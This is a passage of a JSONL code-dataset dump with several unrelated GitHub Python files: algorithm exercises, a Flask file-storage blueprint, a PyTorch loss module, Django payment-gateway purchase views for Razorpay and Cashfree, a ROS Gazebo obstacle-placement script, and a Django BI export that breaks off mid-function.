str(number[i])\n i += 1\n return answer\n\nnumbers = [0, 1, 30]\nprint(solution(numbers))","repo_name":"430lyj/Algorithm","sub_path":"python/programmers_42746.py","file_name":"programmers_42746.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"24757356353","text":"#!/usr/bin/env python3\n\"\"\"Solution to chapter 3, exercise 11: alphabetize_names\"\"\"\n\nimport operator\n\n\nPEOPLE = [{'first': 'Reuven', 'last': 'Lerner',\n 'email': 'reuven@lerner.co.il'},\n {'first': 'Donald', 'last': 'Trump',\n 'email': 'president@whitehouse.gov'},\n {'first': 'Vladimir', 'last': 'Putin',\n 'email': 'president@kremvax.ru'}\n ]\n\n\ndef alphabetize_names(list_of_dicts):\n \"\"\"Take a list of dicts describing people,\neach with first/last/email as keys.\n\nReturn a new list of dicts,\nsorted first by last name and then by first name.\n\nIf passed an empty list, then return an empty list.\n\"\"\"\n return sorted(list_of_dicts, key=operator.itemgetter('last', 'first'))\n","repo_name":"reuven/python-workout","sub_path":"ch03-lists-tuples/e11_alphabetize_names.py","file_name":"e11_alphabetize_names.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"27"} +{"seq_id":"5862718525","text":"from flask import Blueprint, jsonify, request, send_file\nfrom connection import DB\nimport os\nfrom src.utils.helpers import Helpers as H\nfrom config import APP_CONFIG\n\nSTORAGE_BLUEPRINT = Blueprint(\"storage_blueprint\", __name__)\n# STORAGE = os.path.normpath(os.path.join(os.path.dirname( __file__ ), '..', 'storage'))\n\n@STORAGE_BLUEPRINT.route(\"//\", methods=[\"GET\"])\ndef get_map(site_name, file_name):\n try:\n img_path = f\"{APP_CONFIG['storage']}/{site_name.upper()}/{file_name}\"\n ret_val = send_file(img_path, mimetype='image/jpg')\n except Exception as e:\n print(e)\n ret_val = \"#\"\n return ret_val\n\n@STORAGE_BLUEPRINT.route(\"/profile_picture\", methods=[\"POST\"])\ndef upload_profilepicture():\n try:\n files = request.files\n file_path = f\"{APP_CONFIG['storage']}/profile_pictures/\"\n print(f\"{file_path}/profile_pictures\")\n for fetch_filename in files:\n file = request.files[fetch_filename]\n final_path = H.upload(file=file, file_path=file_path)\n response = {'status': 200}\n except Exception as err:\n print(err)\n response = {'status': 400}\n finally:\n return jsonify(response) \n\n@STORAGE_BLUEPRINT.route(\"//\", methods=[\"GET\"])\ndef download_map(site_name, file_name):\n try:\n img_path = f\"{STORAGE}\\{site_name}\\{file_name}\"\n ret_val = send_file(img_path, mimetype='image/jpg')\n except Exception as e:\n ret_val = \"#\"\n return ret_val","repo_name":"dynatech/SamarCluster","sub_path":"server/dynaslope3/src/file_transfer/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41797696420","text":"from pathlib import Path\nimport os\nimport csv, subprocess\nimport sys\n\nfailedRuns = []\npath = \"/users/PAS0654/osu8354/ARA_cvmfs/source/AraRoot/analysis/ARA_analysis/ARA_SourceSearch/OSC_scripts/step6-save_vals_for_cuts/logs/\"\npathlist = Path(path).glob('**/*.out')\nfor path in pathlist:\n # because path is object not string\n path_in_str = str(path)\n with open(path_in_str, 'r') as f:\n for line in f.readlines():\n if 'core dumped' in line:\n# print(line)\n toParse = line\n splitLine = toParse.split()\n runline = splitLine[len(splitLine)-2]\n print(\" \".join(splitLine[8:])+\" &\")\n\n# runline=runline.strip(\"/var/spool/slurmd/job4063219/slurm_script: line 17: 150015 Bus error (core dumped) \")\n# failedRun = runline.partition(\"processed_station_2_run_\")[2].strip(\".\")\n# # print(failedRun)\n# failedRuns.append(failedRun)\n# print(\"%i failed runs\"%len(failedRuns))\n# failedRuns.sort()\n# print(failedRuns)\n","repo_name":"toej93/ARA_analysis","sub_path":"ARA_SourceSearch/OSC_scripts/step6-save_vals_for_cuts/failedJobs/reSubmit.py","file_name":"reSubmit.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"14846618701","text":"import random\nimport torch \nfrom torch.nn import functional \nfrom torch.autograd import Variable \n\nclass SimilarityLoss(torch.nn.Module):\n def __init__(self, margin=2.0):\n self.margin = margin\n\n # euclidean distance\n # harder negative mining thanks to jimmy yan\n def _forward(self, output1, output2, quant=100) -> torch.Tensor:\n # compute the positive loss of all the data\n pos_loss = torch.pow(torch.norm(output2.sub(output1), dim=1), 2)\n neg_loss = torch.empty_like(pos_loss)\n\n quant = min(quant, output1.size(0)-1)\n # find the hardest negative example\n for i, o_i in enumerate(output1):\n values, indices = torch.topk(torch.norm(output2.sub(o_i), dim=1), quant, largest=False)\n\n rn = int(random.random()*quant)\n while indices[rn] == i:\n rn = int(random.random()*quant)\n\n neg_loss[i] = self.margin - values[rn]\n\n neg_loss = torch.clamp(neg_loss, 0.0)\n\n return torch.mean(pos_loss) + torch.mean(neg_loss)\n\ndef MorphemeLoss():\n return torch.nn.NLLLoss()\n\n# helper function for MaskedCrossEntropy\ndef sequence_mask(sequence_length, max_len=None):\n if max_len is None:\n max_len = sequence_length.data.max()\n batch_size = sequence_length.size(0)\n seq_range = torch.range(0, max_len - 1).long()\n seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n seq_range_expand = Variable(seq_range_expand)\n if sequence_length.is_cuda:\n seq_range_expand = seq_range_expand.cuda()\n seq_length_expand = (sequence_length.unsqueeze(1)\n .expand_as(seq_range_expand))\n return seq_range_expand < seq_length_expand\n\n\ndef MaskedCrossEntropy(logits, target, length):\n length = Variable(torch.LongTensor(length)).cuda()\n\n \"\"\"\n Args:\n logits: A Variable containing a FloatTensor of size\n (batch, max_len, num_classes) which contains the\n unnormalized probability for each class.\n target: A Variable containing a LongTensor of size\n (batch, max_len) which contains the index of the true\n class for each corresponding step.\n length: A Variable containing a LongTensor of size (batch,)\n which contains the length of each data in a batch.\n\n Returns:\n loss: An average loss value masked by the length.\n \"\"\"\n\n # logits_flat: (batch * max_len, num_classes)\n logits_flat = logits.view(-1, logits.size(-1))\n # log_probs_flat: (batch * max_len, num_classes)\n log_probs_flat = functional.log_softmax(logits_flat)\n # target_flat: (batch * max_len, 1)\n target_flat = target.view(-1, 1)\n # losses_flat: (batch * max_len, 1)\n losses_flat = -torch.gather(log_probs_flat, dim=1, index=target_flat)\n # losses: (batch, max_len)\n losses = losses_flat.view(*target.size())\n # mask: (batch, max_len)\n mask = sequence_mask(sequence_length=length, max_len=target.size(1))\n losses = losses * mask.float()\n loss = losses.sum() / length.float().sum()\n return loss\n","repo_name":"kpister/pnorm","sub_path":"src/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"1727669016","text":"class Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \n # make sure A is shorter array\n A,B = nums1, nums2\n total = len(nums1)+len(nums2)\n half = total//2\n \n if len(A)>len(B):\n A, B = B, A\n\n #return the value when there is only one value in two lists\n if len(A)==0 and len(B)==1:\n return B[0]\n \n left, right = 0, len(A)-1\n while True:\n # index point to the left most of the left partition\n i = (left+right)//2 # index for A\n j = half-i-2 # index for B\n \n #get the value of each partition edge\n\n if i>=0: Aleft = A[i]\n else: Aleft = float(\"-infinity\")\n \n if (i+1)=0: Bleft = B[j]\n else: Bleft = float(\"-infinity\")\n \n if (j+1)Bright:\n right = i-1\n else:\n left = i+1\n","repo_name":"qiutianchloe/leetcode","sub_path":"MedianofTwoSortedArrays/MedianofTwoSortedArrays.py","file_name":"MedianofTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"12381623839","text":"import uuid\nimport requests\nimport json\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework import status\nfrom django.conf import settings\nfrom django.db import transaction\nimport razorpay\nfrom .models import Purchase, PurchaseSession\nfrom .serializers import PurchaseSerializer, PurchaseSessionSerializer\nfrom course.models import Levels, Plans, Schedule, Course\nfrom course.serializers import PlansSerializer\nfrom user.models import User, Kid \nfrom .emails import sendBookingConfirmationMail\n# Create your views here.\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef CreatePurchase(request):\n payment_method_chosen = request.data.get('payment_method_chosen')\n course_level_id = request.data.get('course_level_id')\n schedule_id = request.data.get('schedule_id')\n plan_selected_id = request.data.get('plan_selected_id')\n kids_selected_ids = request.data.get('kids_selected_ids')\n purchase_price = request.data.get('purchase_price')\n purchase_session_identifier = request.data.get('purchase_session')\n\n try:\n user = request.user\n except User.DoesNotExist:\n return Response({'error': 'Invalid user ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n course_level = Levels.objects.get(id=course_level_id)\n except Levels.DoesNotExist:\n return Response({'error': 'Invalid course level ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n schedule = Schedule.objects.get(id=schedule_id)\n except Schedule.DoesNotExist:\n return Response({'error': 'Invalid schedule ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n plan_selected = Plans.objects.get(id=plan_selected_id)\n except Plans.DoesNotExist:\n return Response({'error': 'Invalid plan selected ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n purchase_session = PurchaseSession.objects.get(identifier=purchase_session_identifier)\n except Exception as e:\n purchase_session = None\n\n kids_selected = user.my_kids.filter(id__in=kids_selected_ids)\n\n new_booking_id = course_level.to_course.slug[:3] + str(uuid.uuid4().hex[:7])\n purchase = Purchase.objects.create(\n user=user,\n course_level=course_level,\n schedule=schedule,\n plan_selected=plan_selected,\n purchase_price=purchase_price,\n booking_id= new_booking_id.upper()\n )\n purchase.kids_selected.set(kids_selected)\n purchase.purchase_session = purchase_session\n\n if schedule.seats_left <= 0 or schedule.seats_left < purchase.kids_selected.count():\n return Response({\"error\": \"zero_slots\"}, status=status.HTTP_400_BAD_REQUEST)\n\n \"\"\"DEMO PLAN SELECTED\"\"\"\n if purchase_price == 0 or purchase_price < 1:\n purchase.payment_status = 'PAID'\n purchase.payment_platform = 'Free Purchase'\n schedule.seats_occupied = int(schedule.seats_occupied) + kids_selected.count()\n purchase.order_id = \"free_purchase_\" + str(user.username) + str(uuid.uuid4().hex[:8])\n purchase.payment_id = \"Free Purchase\"\n purchase.order_signature = \"Free Purchase\"\n schedule.save()\n \"\"\"Update the demo_course table for Kids\"\"\"\n with transaction.atomic():\n for kid in kids_selected:\n kid.demo_courses.add(course_level.to_course)\n purchase.save()\n try:\n sendBookingConfirmationMail(\n user_email=user.email,\n user_first_name=user.first_name,\n course_name=course_level.to_course.name,\n level_name=course_level.name,\n booking_id=purchase.booking_id\n )\n print(\"DEMO\")\n except Exception as e:\n # print(e)\n pass\n data = {}\n data['method'] = 'Free Purchase'\n data['purchase_data'] = PurchaseSerializer(purchase).data\n return Response(data=data, status=status.HTTP_201_CREATED)\n\n\n \"\"\"RAZORPAY ORDER\"\"\"\n if payment_method_chosen == 'Razorpay' and purchase_price > 0:\n client = razorpay.Client(auth=(settings.RAZORPAY_KEY_ID, settings.RAZORPAY_KEY_SECRET))\n DATA = {\n \"amount\": float(purchase.purchase_price) * 100,\n \"currency\": \"INR\",\n \"receipt\": f\"receipt@Razorpay{purchase.id}\",\n \"notes\": {\n \"purchase_id\": purchase.id,\n }\n }\n try:\n razorpay_order = client.order.create(data=DATA)\n purchase.order_id = razorpay_order['id']\n purchase.payment_platform = 'Razorpay'\n purchase.save()\n response_data = {\n 'message': 'Purchase created successfully',\n 'order_created': True, \n 'order': razorpay_order,\n 'RAZORPAY_KEY_ID': settings.RAZORPAY_KEY_ID ,\n 'method': 'Razorpay',\n\n }\n return Response(response_data, status=status.HTTP_201_CREATED)\n except:\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n \n \"\"\"CASHFREE\"\"\"\n if payment_method_chosen == 'Cashfree' and purchase_price > 0:\n url = f\"{settings.CASHFREE_ENDPOINT}/orders\"\n payload = {\n \"customer_details\": {\n \"customer_id\": user.username,\n \"customer_name\": user.get_full_name(),\n \"customer_email\": user.email,\n \"customer_phone\": str(user.phone_number.national_number)\n },\n \"order_amount\": float(purchase.purchase_price),\n \"order_currency\": \"INR\",\n \"order_id\": new_booking_id.upper()\n }\n headers = {\n \"accept\": \"application/json\",\n \"x-client-id\": settings.CASHFREE_APP_ID,\n \"x-client-secret\": settings.CASHFREE_SECRET_KEY,\n \"content-type\": \"application/json\",\n \"x-api-version\": \"2023-08-01\",\n }\n try:\n response = requests.post(url, json=payload, headers=headers)\n res_data = json.loads(response.text)\n purchase.payment_platform = 'Cashfree'\n purchase.order_id = res_data['cf_order_id']\n purchase.payment_id = 'TBD'\n purchase.order_signature = '---'\n schedule.save()\n purchase.save()\n response_data = {\n 'message': 'Purchase created successfully',\n 'order_created': True, \n 'order': res_data,\n 'method': 'Cashfree',\n }\n return Response(response_data, status=status.HTTP_201_CREATED)\n except Exception as e:\n print(\"CASHFREE\", e)\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n \n\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef successPurchaseRazorpay(request):\n razorpay_payment_id = request.data.get('razorpay_payment_id')\n razorpay_order_id = request.data.get('razorpay_order_id')\n razorpay_signature = request.data.get('razorpay_signature')\n purchase_id = request.data.get('purchase_id')\n\n try:\n purchase = Purchase.objects.get(id=purchase_id, user=request.user)\n purchase.payment_id = razorpay_payment_id\n purchase.order_signature = razorpay_signature\n if purchase.order_id == razorpay_order_id:\n purchase.payment_status = 'PAID'\n purchase.schedule.seats_occupied = int(purchase.schedule.seats_occupied) + purchase.kids_selected.count()\n purchase.schedule.save()\n try:\n purchase.purchase_session.session_status = 'COMPLETED'\n purchase.purchase_session.save()\n except Exception as e:\n pass\n purchase.save()\n purchase_data = PurchaseSerializer(purchase)\n return Response({\"updated\": True, 'purchase_data': purchase_data.data}, status=status.HTTP_200_OK)\n else :\n return Response({\"updated\": False, \"message\": \"Order ID didn't matched\"}, status=status.HTTP_400_BAD_REQUEST)\n\n except Purchase.DoesNotExist:\n return Response({'error': 'Purchase Does Not Exists'}, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef failedPurchaseRazorpay(request):\n razorpay_payment_id = request.data.get('razorpay_payment_id')\n razorpay_order_id = request.data.get('razorpay_order_id')\n razorpay_signature = request.data.get('razorpay_signature')\n purchase_id = request.data.get('purchase_id')\n\n try:\n purchase = Purchase.objects.get(id=purchase_id, user=request.user)\n purchase.payment_id = razorpay_payment_id\n purchase.order_signature = razorpay_signature\n if purchase.order_id == razorpay_order_id:\n purchase.payment_status = 'FAILED'\n purchase.payment_platform = 'Razorpay'\n purchase.save()\n return Response({\"updated\": True}, status=status.HTTP_200_OK)\n else :\n return Response({\"updated\": False, \"message\": \"Order ID didn't matched\"}, status=status.HTTP_400_BAD_REQUEST)\n\n except Purchase.DoesNotExist:\n return Response({'error': 'Purchase Does Not Exists'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef getOrderCashfree(request):\n cf_order_id = request.data.get('cf_order_id')\n\n try:\n purchase = Purchase.objects.get(booking_id=cf_order_id, user=request.user, payment_platform='Cashfree', is_active=True)\n url = f\"{settings.CASHFREE_ENDPOINT}/orders/{cf_order_id}/payments\"\n headers = {\n \"accept\": \"application/json\",\n \"x-client-id\": settings.CASHFREE_APP_ID,\n \"x-client-secret\": settings.CASHFREE_SECRET_KEY,\n \"x-api-version\": \"2023-08-01\",\n }\n response = requests.get(url=url, headers=headers)\n res_data = json.loads(response.text)[0]\n if(res_data['payment_status'] == \"SUCCESS\"):\n purchase.payment_status = 'PAID'\n purchase.payment_method = json.dumps(res_data['payment_method'])\n purchase.payment_id = res_data['cf_payment_id']\n purchase.schedule.seats_occupied = int(purchase.schedule.seats_occupied) + purchase.kids_selected.count()\n purchase.schedule.save()\n try:\n purchase.purchase_session.session_status = 'COMPLETED'\n purchase.purchase_session.save()\n except Exception as e:\n pass\n\n purchase.save()\n try:\n sendBookingConfirmationMail(\n user_email= purchase.user.email,\n user_first_name= purchase.user.first_name,\n course_name= purchase.course_level.to_course.name,\n level_name=purchase.course_level.name,\n booking_id=purchase.booking_id\n )\n print(\"CASHFREE\")\n except Exception as e:\n # print(e)\n pass\n response_data = {\n 'payment_status': \"SUCCESS\",\n 'purchase_data': PurchaseSerializer(purchase).data,\n 'plan_selected': PlansSerializer(purchase.plan_selected).data,\n }\n return Response(response_data, status=status.HTTP_200_OK)\n else:\n purchase.payment_status = 'FAILED'\n purchase.payment_id = res_data['cf_payment_id']\n purchase.save()\n response_data = {\n 'payment_status': \"FAILED\",\n 'order_status': res_data,\n 'order_detail': {\n 'payment_method' : purchase.payment_platform,\n 'payment_id': res_data['cf_payment_id'],\n 'order_id': purchase.booking_id,\n 'error_description': res_data['error_details']['error_description'],\n 'purchase_session_identifier': purchase.purchase_session.identifier,\n 'purchase_session_course': purchase.purchase_session.course_selected.slug,\n }\n \n }\n return Response(response_data, status=status.HTTP_200_OK)\n except Purchase.DoesNotExist:\n return Response({'error': 'Purchase Does Not Exists'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(http_method_names=['POST'])\n@permission_classes([IsAuthenticated])\ndef CreatePurchaseSession(request):\n plan_selected = request.data.get('plan_selected')\n level_selected = request.data.get('level_selected')\n course_selected = request.data.get('course_selected')\n\n try:\n user = request.user\n except User.DoesNotExist:\n return Response({'error': 'Invalid user ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n level = Levels.objects.get(id=level_selected)\n except Levels.DoesNotExist:\n return Response({'error': 'Invalid course level ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n course = Course.objects.get(slug=course_selected)\n except Schedule.DoesNotExist:\n return Response({'error': 'Invalid schedule ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n plan = Plans.objects.get(id=plan_selected)\n except Plans.DoesNotExist:\n return Response({'error': 'Invalid plan selected ID'}, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n query_purchase_session = PurchaseSession.objects.filter(\n user=user,\n course_selected=course,\n plan_selected=plan,\n level_selected=level,\n session_status='INCOMPLETE'\n )\n if query_purchase_session.exists():\n query_purchase_session_serializer = PurchaseSessionSerializer(query_purchase_session.last())\n return Response({'purchase_session': query_purchase_session_serializer.data}, status=status.HTTP_200_OK)\n else:\n identifier = str(uuid.uuid4().hex[:16]) \n purchase_session = PurchaseSession.objects.create(\n user=user,\n course_selected=course,\n plan_selected=plan,\n level_selected=level,\n identifier=identifier.upper()\n ) \n purchase_session_serializer = PurchaseSessionSerializer(purchase_session)\n return Response({'purchase_session': purchase_session_serializer.data}, status=status.HTTP_201_CREATED)\n except Exception as e:\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(http_method_names=['GET'])\n@permission_classes([IsAuthenticated])\ndef getPurchaseSession(request, identifier):\n try:\n purchase_session = PurchaseSession.objects.get(\n user=request.user,\n identifier=identifier,\n session_status='INCOMPLETE'\n ) \n purchase_session_serializer = PurchaseSessionSerializer(purchase_session)\n return Response({'purchase_session': purchase_session_serializer.data}, status=status.HTTP_200_OK)\n except PurchaseSession.DoesNotExist:\n return Response({'error': 'Some error ocurred.'}, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n","repo_name":"ArmaanChaand/GurufaBackend","sub_path":"purchase/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26266274040","text":"# import ros package\nimport rospy\nimport rospkg\nfrom gazebo_msgs.msg import ModelState\nfrom geometry_msgs.msg import Twist\nfrom gazebo_msgs.srv import *\n\n# import python package\nimport random\nimport math\nimport numpy as np\nfrom datetime import datetime\n\n\nclass environment():\n def __init__(self):\n self.model_state_x = {}\n self.model_state_y = {}\n self.drone_name = \"quadrotor\"\n # get the model name from the model name text file and store into list\n self.text_file = open(\"/home/iastaff/catkin_ws/src/drone/model_name.txt\", \"r\")\n self.model = self.text_file.readlines()\n self.model_name = [x.strip() for x in self.model]\n self.text_file.close()\n rospy.init_node('generate_model_pos')\n self.update_model_pos = rospy.Publisher(\"/gazebo/set_model_state\", ModelState, queue_size=1)\n self.get_model_pos = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)\n print (\"Finish init\")\n\n def get_obstacles_pos(self):\n self.model_pos = GetModelStateRequest()\n for i in range (len(self.model_name)):\n self.model_pos.model_name = self.model_name[i]\n self.model_state_all = self.get_model_pos(self.model_pos)\n self.model_state_x[i] = self.model_state_all.pose.position.x\n self.model_state_y[i] = self.model_state_all.pose.position.y\n print (\"Finish get obstacles position\")\n \n def set_obstacles_pos(self):\n self.set_state = ModelState()\n #set the forest environment\n for i in range (len(self.model_name)):\n self.set_state.model_name = self.model_name[i]\n # set pose\n self.set_state.pose.position.x = random.uniform(-50.0,50.0)\n self.set_state.pose.position.y = random.uniform(-50.0,50.0)\n self.set_state.pose.orientation.z = random.uniform(-50.0,50.0)\n self.update_model_pos.publish(self.set_state)\n self.model_state_x[i] = self.set_state.pose.position.x # update dict\n self.model_state_y[i] = self.set_state.pose.position.y # update dict\n print (\"update dict finish\")\n rospy.sleep(0.03) # provide buffer time to set model new position\n print (\"Finish reset {} position\".format(self.model_name[i]))\n print (\"{} x:{} y:{}\".format(self.model_name[i],self.set_state.pose.position.x,self.set_state.pose.position.y ))\n\n def set_drone_pos(self):\n self.set_state = ModelState()\n self.set_state.model_name = self.drone_name\n self.set_state.pose.position.x = 55.0\n self.set_state.pose.position.y = -55.0\n self.update_model_pos.publish(self.set_state)\n rospy.sleep(0.03) # provide buffer time to set drone position\n print (\"Finish reset {} position\".format(self.drone_name))\n print (\"{} x:{} y:{}\".format(self.drone_name,self.set_state.pose.position.x,self.set_state.pose.position.y ))\n\nif __name__ == \"__main__\":\n try:\n set_environment = environment()\n set_environment.get_obstacles_pos()\n set_environment.set_obstacles_pos()\n set_environment.set_drone_pos()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Drone-FYP2021-PolyU-EIE/Gazebo-simulation","sub_path":"script/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"22639564842","text":"# This Python file uses the following encoding: utf-8\nfrom aula.apps.alumnes.models import Alumne, Curs\nfrom django.conf import settings\nimport csv\nimport os.path\nfrom aula.apps.usuaris.models import Professor\nfrom aula.apps.horaris.models import FranjaHoraria\nfrom aula.apps.presencia.models import ControlAssistencia\nfrom aula.apps.assignatures.models import Assignatura\nfrom django.utils.datetime_safe import datetime\nimport datetime as t\nfrom datetime import date\nimport hashlib\nfrom django.template.defaultfilters import slugify\n\n\n\n#Dims:\n# Alumnes: id, id_nivell, nivell, id_curs, curs, id_grup, grup,\n# Franja Horaria: id, nom, mati_tarda_vespre\n# Assignatures: id, nom\n# Professors: id, username, nom, cognoms\n# Data: dia, curs, any, mes, dia, trimestre\n#\n#Fact:\n# controls: n_classes,n_assistencies, n_faltes_totals, n_faltes_no_justificades, n_retards, n_justificades\n# incidencies: n_informatives, n_incidencies, n_expulsions, n_expulsions_centre\n# actuacions: n_actuacions_alumne, n_actuacions_familia\n# portal families: n_connexions, n_enviaments, t_resposta\n\ndef export_bi():\n '''\n \n create table alumnes (\n id int,\n nivell varchar(50),\n curs varchar(50),\n grup varchar(90),\n alumne_alias varchar(50),\n alumne_nom varchar(200),\n alumne_hash varchar(100)\n );\n\n create table dates (\n id int,\n data date,\n dia int,\n mes int,\n year int,\n setmana int \n );\n\n create table franges (\n id int,\n hora_inici varchar(20)\n );\n\n create table professors (\n id int,\n professor varchar(100),\n email varchar(100)\n ); \n\n create table assignatures (\n id int,\n assignatura varchar(200)\n ); \n\n create table controls (\n id int,\n alumne_id int,\n assignatura_id int,\n professor_id int,\n data_id int,\n franja_id int,\n n_total_classes int,\n n_de_classes int,\n n_assistencies int,\n n_faltes_totals int,\n n_faltes_no_justificades int,\n n_faltes_justificades int,\n n_retards int\n ); \n\n\n\n\n \n '''\n dim_alumnes()\n dim_assignatures()\n dim_franges() \n dim_professors()\n fact_controls()\n\n# Alumnes: id, id_nivell, nivell, id_curs, curs, id_grup, grup,\ndef dim_alumnes( ):\n file_name = os.path.join( settings.BI_DIR, 'alumnes.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for alumne in Alumne.objects.all():\n\n alumne_row = []\n alumne_row.append( any_inici_curs() )\n alumne_row.append( any_inici_curs() * 10000000 + alumne.pk )\n alumne_row.append( alumne.grup.curs.nivell.pk )\n alumne_row.append( alumne.grup.curs.nivell.nom_nivell )\n alumne_row.append( alumne.grup.curs.pk )\n alumne_row.append( alumne.grup.curs.nom_curs )\n alumne_row.append( alumne.grup.pk )\n alumne_row.append( alumne.grup.descripcio_grup )\n alumne_row.append( 'alumne'+str( alumne.pk ) )\n alumne_row.append( alumne.cognoms + ', '+ alumne.nom )\n writer.writerow( alumne_row ) \n \n ofile.close() \n\n# Franja Horaria: id, nom, mati_tarda_vespre \ndef dim_franges( ):\n file_name = os.path.join( settings.BI_DIR, 'franges.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for element in FranjaHoraria.objects.all():\n\n element_row = []\n element_row.append( any_inici_curs() )\n element_row.append( any_inici_curs() * 10000000 + element.pk )\n element_row.append( element.hora_inici )\n element_row.append( element.hora_fi )\n element_row.append( element.nom_franja )\n writer.writerow( element_row ) \n \n ofile.close() \n\n# Professors: id, username, nom, cognoms \ndef dim_professors( ):\n file_name = os.path.join( settings.BI_DIR, 'professors.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for element in Professor.objects.all():\n\n element_row = []\n element_row.append( any_inici_curs() )\n element_row.append( any_inici_curs() * 10000000 + element.pk )\n element_row.append( element.username )\n element_row.append( element.first_name )\n element_row.append( element.last_name )\n writer.writerow( element_row ) \n \n ofile.close() \n \n# Assignatures: id, nom\ndef dim_assignatures( ): \n file_name = os.path.join( settings.BI_DIR, 'assignatures.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n for element in Assignatura.objects.all():\n\n element_row = []\n element_row.append( any_inici_curs() )\n element_row.append( any_inici_curs() * 10000000 + element.pk )\n element_row.append( element.codi_assignatura )\n writer.writerow( element_row ) \n \n ofile.close() \n\n# Data: dia, curs, any, mes, dia, trimestre \n\n\n#---------------------------------------------------------- DADES per a BI -----------------------------------------------------\n# controls: n_classes,n_assistencies, n_faltes_totals, n_faltes_no_justificades, n_retards, n_justificades\ndef fact_controls( n = -1 , flag_impersona = False ): \n debug = n\n file_name = os.path.join( settings.BI_DIR, 'controls.csv')\n ofile = open(file_name, 'wb')\n writer = csv.writer(ofile)\n \n element_row = []\n \n element_row.append( 'any_inici_curs') \n element_row.append( 'data') \n element_row.append( 'alumne_disociat' )\n element_row.append( 'nom' )\n element_row.append( 'nom_nivell' )\n element_row.append( 'nom_curs' )\n element_row.append( 'descripcio_grup' )\n element_row.append( 'codi_assignatura' )\n \n #franja\n element_row.append( 'hora_inici' )\n element_row.append( 'hora_fi' )\n \n #professor \n element_row.append( 'professor' )\n element_row.append( 'email' )\n \n #facts --- \n element_row.append( 'n_total_classes' )\n element_row.append( 'n_de_classes' )\n element_row.append( 'n_assistencies' )\n element_row.append( 'n_faltes_totals' )\n element_row.append( 'n_faltes_no_justificades' )\n element_row.append( 'n_faltes_justificades' )\n element_row.append( 'n_retards' )\n\n writer.writerow( element_row ) \n\n tots_els_controls_assistencia = ( ControlAssistencia\n .objects\n .exclude( alumne__data_baixa__isnull = False )\n .values_list('id', flat=True)\n .order_by( 'impartir__dia_impartir' )\n )\n \n for pk in tots_els_controls_assistencia:\n element = ControlAssistencia.objects.get( pk = pk )\n debug -= 1\n if debug == 0:\n break\n element_row = []\n \n #any_inici_curs\n element_row.append( any_inici_curs() )\n \n #data\n element_row.append( element.impartir.dia_impartir )\n \n #alumne_disociat\n element_row.append( '{0}-{1}'.format( any_inici_curs() , element.alumne.pk ) )\n\n #alumne\n cognoms_nom = element.alumne.cognoms + u', '+ element.alumne.nom\n if flag_impersona:\n cognoms_nom = hashlib.sha224( slugify( cognoms_nom ) )\n element_row.append( slugify(cognoms_nom ) )\n\n #nivell\n element_row.append( element.alumne.grup.curs.nivell.nom_nivell )\n \n #curs\n element_row.append( element.alumne.grup.curs.nom_curs )\n \n #grup\n element_row.append( element.alumne.grup.descripcio_grup )\n \n #assignatura\n element_row.append( element.impartir.horari.assignatura.codi_assignatura )\n \n #franja\n element_row.append( element.impartir.horari.hora.hora_inici )\n element_row.append( element.impartir.horari.hora.hora_fi )\n \n #professor \n element_row.append( element.impartir.professor_passa_llista.username if element.impartir.professor_passa_llista else \n element.impartir.horari.professor.username )\n \n element_row.append( element.impartir.professor_passa_llista.email if element.impartir.professor_passa_llista else \n element.impartir.horari.professor.email )\n \n #facts ---\n nTotalDeClasses = 1 \n element_row.append( nTotalDeClasses )\n\n nDeClasses = 1 if element.estat is not None else 0\n element_row.append( nDeClasses )\n 